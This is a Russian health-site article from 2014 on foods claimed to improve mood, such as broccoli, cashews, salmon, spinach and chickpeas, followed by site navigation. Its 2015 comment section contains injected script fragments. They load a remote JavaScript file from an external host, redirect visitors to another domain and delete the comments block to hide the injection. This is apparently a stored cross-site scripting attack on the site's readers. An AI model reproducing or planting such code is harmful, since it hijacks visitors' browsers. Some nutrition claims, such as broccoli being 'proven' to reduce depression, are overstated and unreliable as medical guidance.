Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как перестать быть букой ...  >>  Как перестать быть букой – съесть правильную еду
 
Обратная связь
 

Как перестать быть букой – съесть правильную еду

Размер шрифта
11 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Можно ли найти счастье в холодильнике? Можно, если в холодильнике лежат продукты, повышающие настроение. Именно о них пойдет речь в нашей статье.

Как перестать быть букой – съесть правильную еду

Брокколи

В брокколи содержится следовое количество хрома, который улучшает пищеварение и увеличивает содержание в головном мозге серотонина, норадреналина и мелатонина, отвечающих за настроение. Доказано, что брокколи уменьшает симптомы атипичной депрессии, такие как переедание и повышенная сонливость. Хром также содержится в грейпфрутовом соке и картофеле.

Кешью

Кешью содержит цинк, который уменьшает симптомы депрессии и повышает эффективность антидепрессантов. Дефицит цинка может привести к потере аппетита, развитию депрессии и снижению иммунитета. Цинк также содержится в тыквенных семечках и свиной вырезке.

Лосось

В рыбе содержится большое количество витамина D. Это единственный витамин, который образуется в коже под действием ультрафиолетового излучения. Но как получить витамин D в холодное время года? Конечно с едой! Лосось, молоко, яичные желтки – отличные источники витамина D.

Шпинат

Шпинат содержит магний, который участвует в образовании серотонина. Дефицит магния приводит к снижению уровня серотонина, что сопровождается появлением депрессии, тревоги, бессонницы и усталости. Магний также содержится в миндале и соевых бобах.

Нут

Нут содержит витамин B6, который необходим нашему организму для выработки серотонина и норадреналина, влияющих на настроение. Тяжелые дефицит витамина B6 может привести к раздражительности, нервозности и депрессии. Витамин B6 также содержится в куриных грудках и тунце.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лучшая еда для беременной   Как есть настоящую еду   Не хотите задавить ребенка – ешьте шпинат с яйцами!   Сохранять молодость – значит делать выбор в пользу здорового питания  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Лучшая еда для женщин. Часть 2
Еда против рака. Часть 2
Лучшая еда для печени

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.